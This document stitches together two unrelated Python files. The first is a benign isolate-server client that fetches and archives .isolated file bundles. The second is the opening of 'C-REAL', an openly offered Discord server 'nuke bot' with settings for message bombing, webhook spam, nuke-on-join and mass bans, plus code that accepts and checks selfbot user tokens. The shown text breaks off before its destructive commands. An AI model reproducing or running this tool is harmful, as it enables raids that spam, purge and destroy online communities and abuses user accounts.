def __init__(self, filter_cb):
"""
filter_cb: callback function to filter downloaded content.
When filter_cb is not None, Isolated file is downloaded iff
filter_cb(filepath) returns True.
"""
self.command = []
self.files = {}
self.relative_cwd = None
# The main .isolated file, a IsolatedFile instance.
self.root = None
self._filter_cb = filter_cb
def fetch(self, fetch_queue, root_isolated_hash, algo):
"""Fetches the .isolated and all the included .isolated.
It enables support for "included" .isolated files. They are processed in
strict order but fetched asynchronously from the cache. This is important so
that a file in an included .isolated file that is overridden by an embedding
.isolated file is not fetched needlessly. The includes are fetched in one
pass and the files are fetched as soon as all the ones on the left-side
of the tree were fetched.
The prioritization is very important here for nested .isolated files.
'includes' have the highest priority and the algorithm is optimized for both
deep and wide trees. A deep one is a long link of .isolated files referenced
one at a time by one item in 'includes'. A wide one has a large number of
'includes' in a single .isolated file. 'left' is defined as an included
.isolated file earlier in the 'includes' list. So the order of the elements
in 'includes' is important.
As a side effect this method starts asynchronous fetch of all data files
by adding them to |fetch_queue|. It doesn't wait for data files to finish
fetching though.
"""
self.root = isolated_format.IsolatedFile(root_isolated_hash, algo)
# Isolated files being retrieved now: hash -> IsolatedFile instance.
pending = {}
# Set of hashes of already retrieved items to refuse recursive includes.
seen = set()
# Set of IsolatedFile's whose data files have already being fetched.
processed = set()
def retrieve_async(isolated_file):
"""Retrieves an isolated file included by the root bundle."""
h = isolated_file.obj_hash
if h in seen:
raise isolated_format.IsolatedError(
'IsolatedFile %s is retrieved recursively' % h)
assert h not in pending
seen.add(h)
pending[h] = isolated_file
# This isolated item is being added dynamically, notify FetchQueue.
fetch_queue.wait_on(h)
fetch_queue.add(h, priority=threading_utils.PRIORITY_HIGH)
# Start fetching root *.isolated file (single file, not the whole bundle).
retrieve_async(self.root)
while pending:
# Wait until some *.isolated file is fetched, parse it.
item_hash = fetch_queue.wait()
item = pending.pop(item_hash)
with fetch_queue.cache.getfileobj(item_hash) as f:
item.load(f.read())
# Start fetching included *.isolated files.
for new_child in item.children:
retrieve_async(new_child)
# Always fetch *.isolated files in traversal order, waiting if necessary
# until next to-be-processed node loads. "Waiting" is done by yielding
# back to the outer loop, that waits until some *.isolated is loaded.
for node in isolated_format.walk_includes(self.root):
if node not in processed:
# Not visited, and not yet loaded -> wait for it to load.
if not node.is_loaded:
break
# Not visited and loaded -> process it and continue the traversal.
self._start_fetching_files(node, fetch_queue)
processed.add(node)
# All *.isolated files should be processed by now and only them.
all_isolateds = set(isolated_format.walk_includes(self.root))
assert all_isolateds == processed, (all_isolateds, processed)
assert fetch_queue.wait_queue_empty, 'FetchQueue should have been emptied'
# Extract 'command' and other bundle properties.
for node in isolated_format.walk_includes(self.root):
self._update_self(node)
self.relative_cwd = self.relative_cwd or ''
def _start_fetching_files(self, isolated, fetch_queue):
"""Starts fetching files from |isolated| that are not yet being fetched.
Modifies self.files.
"""
files = isolated.data.get('files', {})
logging.debug('fetch_files(%s, %d)', isolated.obj_hash, len(files))
for filepath, properties in files.items():
if self._filter_cb and not self._filter_cb(filepath):
continue
# Root isolated has priority on the files being mapped. In particular,
# overridden files must not be fetched.
if filepath not in self.files:
self.files[filepath] = properties
# Preemptively request hashed files.
if 'h' in properties:
fetch_queue.add(
properties['h'], properties['s'], threading_utils.PRIORITY_MED)
def _update_self(self, node):
"""Extracts bundle global parameters from loaded *.isolated file.
Will be called with each loaded *.isolated file in order of traversal of
isolated include graph (see isolated_format.walk_includes).
"""
# Grabs properties.
if not self.command and node.data.get('command'):
# Ensure paths are correctly separated on windows.
self.command = node.data['command']
if self.command:
self.command[0] = self.command[0].replace('/', os.path.sep)
if (self.relative_cwd is None and
node.data.get('relative_cwd') is not None):
self.relative_cwd = node.data['relative_cwd']
def get_storage(server_ref):
"""Returns Storage class that can upload and download from |namespace|.
Arguments:
server_ref: isolate_storage.ServerRef instance.
Returns:
Instance of Storage.
"""
# Handle the specific internal use case.
assert (isinstance(server_ref, isolate_storage.ServerRef) or
type(server_ref).__name__ == 'ServerRef'), repr(server_ref)
return Storage(isolate_storage.get_storage_api(server_ref))
def _map_file(dst, digest, props, cache, use_symlinks):
"""Put downloaded file to destination path. This function is used for multi
threaded file putting.
"""
with tools.Profiler("_map_file for %s" % dst):
with cache.getfileobj(digest) as srcfileobj:
filetype = props.get('t', 'basic')
if filetype == 'basic':
# Ignore all bits apart from the user.
file_mode = (props.get('m') or 0o500) & 0o700
putfile(srcfileobj, dst, file_mode, use_symlink=use_symlinks)
elif filetype == 'tar':
basedir = os.path.dirname(dst)
with tarfile.TarFile(fileobj=srcfileobj, encoding='utf-8') as t:
ensured_dirs = set()
for ti in t:
if not ti.isfile():
logging.warning('Path(%r) is nonfile (%s), skipped', ti.name,
ti.type)
continue
# Handle files created on Windows fetched on POSIX and the
# reverse.
other_sep = '/' if os.path.sep == '\\' else '\\'
name = ti.name.replace(other_sep, os.path.sep)
fp = os.path.normpath(os.path.join(basedir, name))
if not fp.startswith(basedir):
logging.error('Path(%r) is outside root directory', fp)
ifd = t.extractfile(ti)
fp_dir = os.path.dirname(fp)
if fp_dir not in ensured_dirs:
file_path.ensure_tree(fp_dir)
ensured_dirs.add(fp_dir)
file_mode = ti.mode & 0o700
putfile(ifd, fp, file_mode, ti.size)
else:
raise isolated_format.IsolatedError('Unknown file type %r' % filetype)
def fetch_isolated(isolated_hash, storage, cache, outdir, use_symlinks,
filter_cb=None):
"""Aggressively downloads the .isolated file(s), then download all the files.
Arguments:
isolated_hash: hash of the root *.isolated file.
storage: Storage class that communicates with isolate storage.
cache: ContentAddressedCache class that knows how to store and map files
locally.
outdir: Output directory to map file tree to.
use_symlinks: Use symlinks instead of hardlinks when True.
filter_cb: filter that works as allowlist for downloaded files.
Returns:
IsolatedBundle object that holds details about loaded *.isolated file.
"""
logging.debug(
'fetch_isolated(%s, %s, %s, %s, %s)',
isolated_hash, storage, cache, outdir, use_symlinks)
# Hash algorithm to use, defined by namespace |storage| is using.
algo = storage.server_ref.hash_algo
fetch_queue = FetchQueue(storage, cache)
bundle = IsolatedBundle(filter_cb)
with tools.Profiler('GetIsolateds'):
# Optionally support local files by manually adding them to cache.
if not isolated_format.is_valid_hash(isolated_hash, algo):
logging.debug(
'%s is not a valid hash, assuming a file '
'(algo was %s, hash size was %d)', isolated_hash, algo(),
algo().digest_size)
path = six.text_type(os.path.abspath(isolated_hash))
try:
isolated_hash = fetch_queue.inject_local_file(path, algo)
except IOError as e:
raise isolated_format.MappingError(
'%s doesn\'t seem to be a valid file. Did you intent to pass a '
'valid hash (error: %s)?' % (isolated_hash, e))
# Load all *.isolated and start loading rest of the files.
bundle.fetch(fetch_queue, isolated_hash, algo)
with tools.Profiler('GetRest'):
# Create file system hierarchy.
file_path.ensure_tree(outdir)
create_directories(outdir, bundle.files)
_create_symlinks(outdir, bundle.files.items())
# Ensure working directory exists.
cwd = os.path.normpath(os.path.join(outdir, bundle.relative_cwd))
file_path.ensure_tree(cwd)
# Multimap: digest -> list of pairs (path, props).
remaining = {}
for filepath, props in bundle.files.items():
if 'h' in props:
remaining.setdefault(props['h'], []).append((filepath, props))
fetch_queue.wait_on(props['h'])
# Now block on the remaining files to be downloaded and mapped.
logging.info('Retrieving remaining files (%d of them)...',
fetch_queue.pending_count)
last_update = time.time()
with threading_utils.ThreadPool(2, 32, 32) as putfile_thread_pool:
with threading_utils.DeadlockDetector(DEADLOCK_TIMEOUT) as detector:
while remaining:
detector.ping()
# Wait for any item to finish fetching to cache.
digest = fetch_queue.wait()
# Create the files in the destination using item in cache as the
# source.
for filepath, props in remaining.pop(digest):
fullpath = os.path.join(outdir, filepath)
putfile_thread_pool.add_task(threading_utils.PRIORITY_HIGH,
_map_file, fullpath, digest, props,
cache, use_symlinks)
# Report progress.
duration = time.time() - last_update
if duration > DELAY_BETWEEN_UPDATES_IN_SECS:
msg = '%d files remaining...' % len(remaining)
sys.stdout.write(msg + '\n')
sys.stdout.flush()
logging.info(msg)
last_update = time.time()
assert fetch_queue.wait_queue_empty, 'FetchQueue should have been emptied'
putfile_thread_pool.join()
# Save the cache right away to not loose the state of the new objects.
cache.save()
# Cache could evict some items we just tried to fetch, it's a fatal error.
if not fetch_queue.verify_all_cached():
free_disk = file_path.get_free_space(cache.cache_dir)
msg = (
'Cache is too small to hold all requested files.\n'
' %s\n cache=%dbytes, %d items; %sb free_space') % (
cache.policies, cache.total_size, len(cache), free_disk)
raise isolated_format.MappingError(msg)
return bundle
def _directory_to_metadata(root, algo, denylist):
"""Yields every file and/or symlink found.
Yields:
tuple(FileItem, relpath, metadata)
For a symlink, FileItem is None.
"""
# Current tar file bundle, if any.
root = file_path.get_native_path_case(root)
bundle = TarBundle(root, algo)
for relpath, issymlink in isolated_format.expand_directory_and_symlink(
root,
u'.' + os.path.sep,
denylist,
follow_symlinks=(sys.platform != 'win32')):
filepath = os.path.join(root, relpath)
if issymlink:
# TODO(maruel): Do not call this.
meta = isolated_format.file_to_metadata(filepath, False)
yield None, relpath, meta
continue
prio = relpath.endswith('.isolated')
if bundle.try_add(FileItem(path=filepath, algo=algo, high_priority=prio)):
# The file was added to the current pending tarball and won't be archived
# individually.
continue
# Flush and reset the bundle.
for i, p, m in bundle.yield_item_path_meta():
yield i, p, m
bundle = TarBundle(root, algo)
# Yield the file individually.
item = FileItem(path=filepath, algo=algo, size=None, high_priority=prio)
yield item, relpath, item.meta
for i, p, m in bundle.yield_item_path_meta():
yield i, p, m
def _print_upload_stats(items, missing):
"""Prints upload stats."""
total = len(items)
total_size = sum(f.size for f in items)
logging.info(
'Total: %6d, %9.1fkiB', total, total_size / 1024.)
cache_hit = set(items).difference(missing)
cache_hit_size = sum(f.size for f in cache_hit)
logging.info(
'cache hit: %6d, %9.1fkiB, %6.2f%% files, %6.2f%% size',
len(cache_hit),
cache_hit_size / 1024.,
len(cache_hit) * 100. / total,
cache_hit_size * 100. / total_size if total_size else 0)
cache_miss = missing
cache_miss_size = sum(f.size for f in cache_miss)
logging.info('cache miss: %6d, %9.1fkiB, %6.2f%% files, %6.2f%% size',
len(cache_miss), cache_miss_size / 1024.,
len(cache_miss) * 100. / total,
cache_miss_size * 100. / total_size if total_size else 0)
def _enqueue_dir(dirpath, denylist, hash_algo, hash_algo_name):
"""Called by archive_files_to_storage for a directory.
Create an .isolated file.
Yields:
FileItem for every file found, plus one for the .isolated file itself.
"""
files = {}
for item, relpath, meta in _directory_to_metadata(dirpath, hash_algo,
denylist):
# item is None for a symlink.
files[relpath] = meta
if item:
yield item
# TODO(maruel): If there' not file, don't yield an .isolated file.
data = {
'algo': hash_algo_name,
'files': files,
'version': isolated_format.ISOLATED_FILE_VERSION,
}
# Keep the file in memory. This is fine because .isolated files are relatively
# small.
yield BufferItem(
tools.format_json(data, True).encode(),
algo=hash_algo,
high_priority=True)
def _archive_files_to_storage_internal(storage,
files,
denylist,
verify_push=False):
"""Stores every entry into remote storage and returns stats.
Arguments:
storage: a Storage object that communicates with the remote object store.
files: iterable of files to upload. If a directory is specified (with a
trailing slash), a .isolated file is created and its hash is returned.
Duplicates are skipped.
denylist: function that returns True if a file should be omitted.
verify_push: verify files are uploaded correctly by fetching from server.
Returns:
tuple(OrderedDict(path: hash), list(FileItem cold), list(FileItem hot)).
The first file in the first item is always the .isolated file.
Raises:
Re-raises the exception in upload_items(), if there is any.
"""
# Dict of path to hash.
results = collections.OrderedDict()
hash_algo = storage.server_ref.hash_algo
hash_algo_name = storage.server_ref.hash_algo_name
# Generator of FileItem to pass to upload_items() concurrent operation.
channel = threading_utils.TaskChannel()
exc_channel = threading_utils.TaskChannel()
uploaded_digests = set()
def _upload_items():
try:
results = storage.upload_items(channel, verify_push)
uploaded_digests.update(f.digest for f in results)
except Exception:
exc_channel.send_exception()
t = threading.Thread(target=_upload_items)
t.start()
# Keep track locally of the items to determine cold and hot items.
items_found = []
try:
for f in files:
assert isinstance(f, six.text_type), repr(f)
if f in results:
# Duplicate
continue
try:
filepath = os.path.abspath(f)
if fs.isdir(filepath):
# Uploading a whole directory.
item = None
for item in _enqueue_dir(filepath, denylist, hash_algo,
hash_algo_name):
channel.send_result(item)
items_found.append(item)
# The very last item will be the .isolated file.
if not item:
# There was no file in the directory.
continue
elif fs.isfile(filepath):
item = FileItem(
path=filepath,
algo=hash_algo,
size=None,
high_priority=f.endswith('.isolated'))
channel.send_result(item)
items_found.append(item)
else:
raise Error('%s is neither a file or directory.' % f)
results[f] = item.digest
except OSError:
raise Error('Failed to process %s.' % f)
finally:
# Stops the generator, so _upload_items() can exit.
channel.send_done()
t.join()
exc_channel.send_done()
try:
for _ in exc_channel:
pass
except Exception:
# log items when failed to upload files.
for item in items_found:
if isinstance(item, FileItem):
logging.error('FileItem path: %s, digest:%s, re-calculated digest:%s',
item.path, item.digest,
isolated_format.hash_file(item.path, item.algo))
continue
logging.error('Item digest:%s', item.digest)
raise
cold = []
hot = []
for i in items_found:
# Note that multiple FileItem may have the same .digest.
if i.digest in uploaded_digests:
cold.append(i)
else:
hot.append(i)
return results, cold, hot
# TODO(crbug.com/1073832):
# remove this if process leak in coverage build was fixed.
def archive_files_to_storage(storage, files, denylist, verify_push=False):
"""Calls _archive_files_to_storage_internal with retry.
Arguments:
See Arguments section in _archive_files_to_storage_internal
Returns:
See Returns section in _archive_files_to_storage_internal
Raises:
Re-raises the exception in _archive_files_to_storage_internal if all retry
failed.
"""
# Will do exponential backoff.
# e.g. 10, 20, 40, 80
backoff = 10
while True:
try:
return _archive_files_to_storage_internal(storage, files, denylist,
verify_push)
except Exception:
if backoff > 100:
raise
on_error.report('error before %d second backoff' % backoff)
logging.exception(
'failed to run _archive_files_to_storage_internal,'
' will retry after %d seconds', backoff)
time.sleep(backoff)
backoff *= 2
@subcommand.usage('<file1..fileN> or - to read from stdin')
def CMDarchive(parser, args):
"""Archives data to the server.
If a directory is specified, a .isolated file is created the whole directory
is uploaded. Then this .isolated file can be included in another one to run
commands.
The commands output each file that was processed with its content hash. For
directories, the .isolated generated for the directory is listed as the
directory entry itself.
"""
add_isolate_server_options(parser)
add_archive_options(parser)
options, files = parser.parse_args(args)
process_isolate_server_options(parser, options, True)
server_ref = isolate_storage.ServerRef(
options.isolate_server, options.namespace)
if files == ['-']:
files = (l.rstrip('\n\r') for l in sys.stdin)
if not files:
parser.error('Nothing to upload')
files = (six.ensure_text(f) for f in files)
denylist = tools.gen_denylist(options.blacklist)
try:
with get_storage(server_ref) as storage:
results, _cold, _hot = archive_files_to_storage(storage, files, denylist)
except (Error, local_caching.NoMoreSpace) as e:
parser.error(e.args[0])
print('\n'.join('%s %s' % (h, f) for f, h in results.items()))
return 0
def CMDdownload(parser, args):
"""Download data from the server.
It can either download individual files or a complete tree from a .isolated
file.
"""
add_isolate_server_options(parser)
parser.add_option(
'-s', '--isolated', metavar='HASH',
help='hash of an isolated file, .isolated file content is discarded, use '
'--file if you need it')
parser.add_option(
'-f',
'--file',
metavar='HASH DEST',
default=[],
action='append',
nargs=2,
help='hash and destination of a file, can be used multiple times')
parser.add_option(
'-t',
'--target',
metavar='DIR',
default='download',
help='destination directory')
parser.add_option(
'--use-symlinks',
action='store_true',
help='Use symlinks instead of hardlinks')
add_cache_options(parser)
options, args = parser.parse_args(args)
if args:
parser.error('Unsupported arguments: %s' % args)
if not file_path.enable_symlink():
logging.warning('Symlink support is not enabled')
process_isolate_server_options(parser, options, True)
if bool(options.isolated) == bool(options.file):
parser.error('Use one of --isolated or --file, and only one.')
if not options.cache and options.use_symlinks:
parser.error('--use-symlinks require the use of a cache with --cache')
cache = process_cache_options(options, trim=True)
cache.cleanup()
options.target = six.text_type(os.path.abspath(options.target))
if options.isolated:
if (fs.isfile(options.target) or
(fs.isdir(options.target) and fs.listdir(options.target))):
parser.error(
'--target \'%s\' exists, please use another target' % options.target)
server_ref = isolate_storage.ServerRef(
options.isolate_server, options.namespace)
with get_storage(server_ref) as storage:
# Fetching individual files.
if options.file:
# TODO(maruel): Enable cache in this case too.
channel = threading_utils.TaskChannel()
pending = {}
for digest, dest in options.file:
dest = six.text_type(dest)
pending[digest] = dest
storage.async_fetch(
channel, threading_utils.PRIORITY_MED, digest,
local_caching.UNKNOWN_FILE_SIZE,
functools.partial(local_caching.file_write,
os.path.join(options.target, dest)))
while pending:
fetched = channel.next()
dest = pending.pop(fetched)
logging.info('%s: %s', fetched, dest)
# Fetching whole isolated tree.
if options.isolated:
bundle = fetch_isolated(
isolated_hash=options.isolated,
storage=storage,
cache=cache,
outdir=options.target,
use_symlinks=options.use_symlinks)
cache.trim()
if bundle.command:
rel = os.path.join(options.target, bundle.relative_cwd)
print('To run this test please run from the directory %s:' %
os.path.join(options.target, rel))
print(' ' + ' '.join(bundle.command))
return 0
def add_archive_options(parser):
parser.add_option(
'--blacklist',
action='append',
default=list(DEFAULT_DENYLIST),
help='List of regexp to use as denylist filter when uploading '
'directories')
def add_isolate_server_options(parser):
"""Adds --isolate-server and --namespace options to parser."""
parser.add_option(
'-I', '--isolate-server',
metavar='URL', default=os.environ.get('ISOLATE_SERVER', ''),
help='URL of the Isolate Server to use. Defaults to the environment '
'variable ISOLATE_SERVER if set. No need to specify https://, this '
'is assumed.')
parser.add_option(
'--namespace',
default='default-gzip',
help='The namespace to use on the Isolate Server, default: %default')
def process_isolate_server_options(parser, options, required):
"""Processes the --isolate-server option.
Returns the identity as determined by the server.
"""
if not options.isolate_server:
if required:
parser.error('--isolate-server is required.')
return
try:
options.isolate_server = net.fix_url(options.isolate_server)
except ValueError as e:
parser.error('--isolate-server %s' % e)
try:
return auth.ensure_logged_in(options.isolate_server)
except ValueError as e:
parser.error(str(e))
return None
def add_cache_options(parser):
cache_group = optparse.OptionGroup(parser, 'Isolated cache management')
cache_group.add_option(
'--cache', metavar='DIR', default='cache',
help='Directory to keep a local cache of the files. Accelerates download '
'by reusing already downloaded files. Default=%default')
cache_group.add_option(
'--max-cache-size',
type='int',
metavar='NNN',
default=50*1024*1024*1024,
help='Trim if the cache gets larger than this value, default=%default')
cache_group.add_option(
'--min-free-space',
type='int',
metavar='NNN',
default=2*1024*1024*1024,
help='Trim if disk free space becomes lower than this value, '
'default=%default')
cache_group.add_option(
'--max-items',
type='int',
metavar='NNN',
default=100000,
help='Trim if more than this number of items are in the cache '
'default=%default')
parser.add_option_group(cache_group)
def process_cache_options(options, trim, **kwargs):
if options.cache:
policies = local_caching.CachePolicies(
options.max_cache_size,
options.min_free_space,
options.max_items,
# 3 weeks.
max_age_secs=21 * 24 * 60 * 60)
# |options.cache| path may not exist until DiskContentAddressedCache()
# instance is created.
return local_caching.DiskContentAddressedCache(
six.text_type(os.path.abspath(options.cache)), policies, trim, **kwargs)
return local_caching.MemoryContentAddressedCache()
class OptionParserIsolateServer(logging_utils.OptionParserWithLogging):
def __init__(self, **kwargs):
logging_utils.OptionParserWithLogging.__init__(
self,
version=__version__,
prog=os.path.basename(sys.modules[__name__].__file__),
**kwargs)
auth.add_auth_options(self)
def parse_args(self, *args, **kwargs):
options, args = logging_utils.OptionParserWithLogging.parse_args(
self, *args, **kwargs)
auth.process_auth_options(self, options)
return options, args
def main(args):
dispatcher = subcommand.CommandDispatcher(__name__)
return dispatcher.execute(OptionParserIsolateServer(), args)
if __name__ == '__main__':
subprocess42.inhibit_os_error_reporting()
fix_encoding.fix_encoding()
tools.disable_buffering()
colorama.init()
net.set_user_agent('isolateserver.py/' + __version__)
sys.exit(main(sys.argv[1:]))
|
c-realV2.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# discord
import discord, sys, requests, os, time
from discord.ext import commands
import asyncio
from packaging import version
from random import randint, choice, randrange, random, choices
from threading import Thread
from inputimeout import inputimeout, TimeoutOccurred
from queue import Queue
from io import BytesIO
from pathlib import Path
from math import ceil
from copy import deepcopy
if sys.platform == 'linux':
import simplejson as json
else:
import json
# style
from colorama import init, Fore
init(autoreset=True)
#
__TITLE__ = "C-REAL"
__VERSION__ = "2.4.0"
__AUTHOR__ = "TKperson"
__LICENSE__ = "MIT"
# Global vars
per_page = 15
commands_per_page = 5
number_of_bomb_default = 250
selected_server = None
sorted_commands = []
webhook_targets = []
saved_ctx = None
nuke_on_join = False
auto_nick = False
auto_status = False
selfbot_has_perm = False
timeout = 6
fetching_members = False
bad_filename_map = dict((ord(char), None) for char in '<>:"\\/|?*')
grant_all_permissions = False
# normal functions==============
def exit():
try:
input('Press enter to exit...')
except (EOFError, KeyboardInterrupt):
pass
sys.exit(1)
def banner():
"""Handler for non-unicode consoles"""
sys.stdout.buffer.write(f'''\
██████╗ ██████╗ ███████╗ █████╗ ██╗
██╔════╝ ██╔══██╗██╔════╝██╔══██╗██║ Version: {__VERSION__}
██║ █████╗ ██████╔╝█████╗ ███████║██║ Made by:
██║ ╚════╝ ██╔══██╗██╔══╝ ██╔══██║██║ TKperson
╚██████╗ ██║ ██║███████╗██║ ██║███████╗ and
╚═════╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ cyxl
'''.encode('utf8'))
if version.parse('1.5.1') > version.parse(discord.__version__):
print('Please update your discord.py.')
exit()
settings = {"token":None,"permissions":[],"bot_permission":"2146958847","command_prefix":".","bot_status":"offline","verbose":15,"bomb_messages":{"random":None,"fixed":[]},"webhook_spam":{"usernames":[],"pfp_urls":[],"contents":[]},"after":[],"proxies":[],"ban_whitelist":[]}
def setUp():
# check location
from glob import glob
config = None
config_parent_dir = os.path.join(Path().absolute().__str__(), 'data')
config_path = os.path.join(config_parent_dir, 'default.json')
json_paths = glob(os.path.join(Path().absolute().__str__(), 'data', '*.json'))
def getConfig(choice, timeout):
while True:
# it really doesn't matter if I use triple quotes or not.... the speed is going to be the same and doing this looks better
print('=========================')
print('| |')
print('| [{0}] Load default.json |'.format('1' if 1 in choice else 'x'))
print('| [{0}] Select .json file |'.format('2' if 2 in choice else 'x'))
print('| [{0}] Create a new json |'.format('3' if 3 in choice else 'x'))
print('| |')
print('=========================')
print('[x] = not Available;')
try:
response = inputimeout(prompt='Auto boot with choice [1] in %d seconds...\nChoose 1, 2, or 3\n>> ' % timeout, timeout=timeout)
except TimeoutOccurred:
response = '1'
if response == '1':
if not os.path.isfile(config_path):
print(f'Unable to find file: {config_path}')
continue
with open(config_path, 'r', encoding='utf8') as f:
try:
return json.loads(f.read())
except json.decoder.JSONDecodeError:
print(f'There are some errors occured when reading the configuration file. File path -> {config_path}\nI recommend you use https://jsonlint.com/?code= to help checking the configuration file. Skipping reading the default.json file...')
break
elif response == '2':
while True:
print('=========================')
print('0) Go back')
for i, path in enumerate(json_paths):
print(f'{str(i+1)}) {path}')
index = input('Select the .json file.\n>> ')
if not index.isdigit() or not (0 <= (index := int(index)) <= len(json_paths)):
print(f'You need to enter an integer that is between or on 0 and {str(len(json_paths))}')
continue
if index == 0:
timeout = 999999
break
with open(json_paths[index-1], 'r', encoding='utf8') as f:
try:
return json.loads(f.read())
except json.decoder.JSONDecodeError:
print(f'There are some errors occured when reading the configuration file. File path -> {config_path}\nI recommend you use https://jsonlint.com/?code= to help checking the configuration file. Skipping reading the default.json file...')
elif response == '3':
break
global settings, settings_copy
if os.path.isfile(config_path): # have default.json
config = getConfig([1,2,3], 5)
elif len(json_paths) > 0: # dont have default.json but have other .json file
config = getConfig([2,3], 999999)
if config is not None:
settings.update(config)
else:
try:
# from getpass import getpass
# settings['token'] = getpass('Enter token. Note: Whatever you entered here will not be displayed.\n>> ')
settings['token'] = input('Enter token. Note: Whatever you entered here will not be displayed.\n>> ')
settings['permissions'].append(input('\nEnter your discord tag or user ID. It is recommended to use discord user ID because some unicode names are hard for the code to check.\n>> '))
except KeyboardInterrupt:
sys.exit(0)
except EOFError:
print('Invalid input/EOFError. This may be caused by some unicode.')
exit()
print('\nTips:')
print('The default command_prefix is: .')
print(f'Your currect command_prefix is: {settings["command_prefix"]}')
print(f'Use {settings["command_prefix"]}config to config the settings and more info about how to config.\n')
print('Join our discord https://discord.gg/REMwN7s68S')
settings_copy = deepcopy(settings)
setUp()
# token, permissions, bomb_messages, webhook_spam, bot_permission, command_prefix, bot_status, verbose, after, proxies = readJson()
want_log_request = want_log_console = want_log_message = want_log_errors = 0
def updateVerbose():
global want_log_request, want_log_console, want_log_message, want_log_errors
verbose = settings['verbose']
want_log_request = verbose & 1 << 0
want_log_console = verbose & 1 << 1
want_log_message = verbose & 1 << 2
want_log_errors = verbose & 1 << 3
updateVerbose()
# def randomProxy(protocol):
# # As long it works fine then i'm using this method
# if proxies is None or len(proxies) == 0:
# return None
# return {protocol: choice(proxies)}
is_selfbot = True
headers = {}
def checkToken(token=None):
if token is None:
token = settings['token']
global is_selfbot, headers
try:
headers = {'authorization': token, 'content-type': 'application/json'}
print('Checking selfbot token.', end='\r')
if not 'id' in requests.get(url='https://discord.com/api/v8/users/@me', timeout=timeout, headers=headers).json():
# This is the hardest thing that I have tried to find in my life took me ages to know "Bot <token>" is actually the bot's authorization
# Reading source codes is always a good thing :)
headers['authorization'] = 'Bot ' + token
print('Checking normal bot token.', end='\r')
if not 'id' in requests.get(url='https://discord.com/api/v8/users/@me', timeout=timeout, headers=headers).json():
print('Invalid token is being used.')
exit()
else:
is_selfbot = False
# except requests.exceptions.ProxyError:
# print('Bad proxy is being used. You can try to change a proxy or restart the bot.')
# exit()
# except requests.exceptions.ConnectTimeout:
# print(f'Proxy reached maximum load time: timeout is {timeout} seconds long.')
# exit()
except requests.exceptions.ConnectionError:
print('You should probably consider connecting to the internet before using any discord related stuff. If you are connected to wifi and still seeing this message, then maybe try turn off your VPN/proxy/TOR node. If you are still seeing this message or you just don\'t what to turn off vpn, you can try to use websites like repl/heroku/google cloud to host the bot for you. The source code is on https://github.com/TKperson/Nuking-Discord-Server-Bot-Nuke-Bot.')
exit()
except (requests.exceptions.InvalidHeader, json.decoder.JSONDecodeError):
print('Invalid token is being used.')
exit()
checkToken()
### check updates
print('Checking update... ', end='\r')
github_version = requests.get('https://raw.githubusercontent.com/TKperson/Nuking-Discord-Server-Bot-Nuke-Bot/master/VERSION.txt').text
if version.parse(github_version) > version.parse(__VERSION__):
print(f'New C-REAL update has been launched -> {github_version} <- :party:')
print('Loading scripts...' + ' ' * 15, end='\r')
"""
command_prefix - command prefix
case_insensitive - commands will be callable without case retrictions if this is set to true
self_bot - self_bot: :class:`bool`
If ``True``, the bot will only listen to commands invoked by itself rather
than ignoring itself. If ``False`` (the default) then the bot will ignore
itself. This cannot be changed once initialised.
intents - intents: :class:`Intents`
The intents that you want to enable for the session. This is a way of
disabling and enabling certain gateway events from triggering and being sent.
If not given, defaults to a regularly constructed :class:`Intents` class.
"""
async def determine_prefix(bot, message): # https://stackoverflow.com/questions/56796991/discord-py-changing-prefix-with-command
return settings['command_prefix']
# client = commands.Bot(command_prefix=determine_prefix, case_insensitive=True, self_bot=is_selfbot, proxies=randomProxy('http'))
client = commands.Bot(command_prefix=settings['command_prefix'], case_insensitive=True, self_bot=is_selfbot, intents=discord.Intents().all())
client.remove_command('help')
######### Events #########
@client.event
async def on_connect():
if is_selfbot:
for user in settings['permissions']:
if str(client.user.id) == user or f'{client.user.name}#{client.user.discriminator}' == user:
global selfbot_has_perm
selfbot_has_perm = True
settings['permissions'].append(str(client.user.id))
global sorted_commands
sorted_commands = sorted(client.commands, key=lambda e: e.name[0])
await changeStatus(None, settings['bot_status'])
@client.event
async def on_ready():
banner()
print('/+========================================================')
print(f'| | {Fore.GREEN}Bot ready.')
print(f'| {Fore.MAGENTA}+ Logged in as')
print(f'| | {client.user.name}#{client.user.discriminator}')
print(f'| | {client.user.id}')
print(f'| {Fore.MAGENTA}+ Permission given to ')
for permission in settings['permissions']:
print(f'| | {permission}')
print(f'| {Fore.MAGENTA}+ Command prefix: ' + settings['command_prefix'])
if is_selfbot:
print(f'| {Fore.YELLOW}+ [Selfbot] This is a selfbot. Join servers with join codes.')
else:
print(f'| {Fore.YELLOW}+ https://discord.com/api/oauth2/authorize?client_id={client.user.id}&permissions={settings["bot_permission"]}&scope=bot')
print('| ~*************************************')
print('\\+-----')
@client.event
async def on_disconnect():
'''
on_disconnect - when the script is disconnected with the profile the bot will run this command
usage: reset status
'''
await changeStatus(None, 'offline')
### logs ###
async def log(ctx, message):
"""
Logging messages to the user
no args, but has settings.
Modes:
- Discord side
- coming soon
"""
if want_log_message:
# if not isDM(ctx) and ctx.guild.id == selected_server.id and 1 << 11 & selected_server.me.guild_permissions.value == 0:
# consoleLog(message, True)
# else:
try:
await ctx.send(message)
except discord.errors.HTTPException:
for i in range(ceil(len(message) / 2000)):
await log(ctx, message[2000 * i:2000 * (i + 1)])
except:
consoleLog(message)
def consoleLog(message, print_time=False):
if want_log_console:
TIME = ''
if print_time:
TIME = f'{Fore.MAGENTA}[{time.strftime("%H:%M:%S", time.localtime())}] {Fore.RESET}'
try:
print(f'{TIME}{message}')
except TypeError: # when there's a character that can't be logged with python print function.
sys.stdout.buffer.write(f'{TIME}{message}'.encode('utf8'))
@client.event
async def on_command_error(ctx, error):
# source: https://gist.github.com/AileenLumina/510438b241c16a2960e9b0b014d9ed06
# source: https://github.com/Rapptz/discord.py/blob/master/discord/errors.py
"""
Error handlers
It's always a good idea to look into the source code to find things that are hard to find on the internet.
"""
# Debug mode
# raise error
if not want_log_errors or hasattr(ctx.command, 'on_error'):
return
# get the original exception
error = getattr(error, 'original', error)
# print(error)
# print(str(type(error)))
if isinstance(error, commands.CommandNotFound):
if checkPerm(ctx):
try:
await log(ctx, f'Command `{ctx.message.content}` is not found.')
except discord.errors.HTTPException:
await log(ctx, 'That command is not found.')
elif isinstance(error, commands.CheckFailure):
pass
elif isinstance(error, discord.Forbidden):
await log(ctx, f'403 Forbidden: Missing permission.')
elif isinstance(error, discord.errors.HTTPException): # usually caused by sending over 2000 characters limit
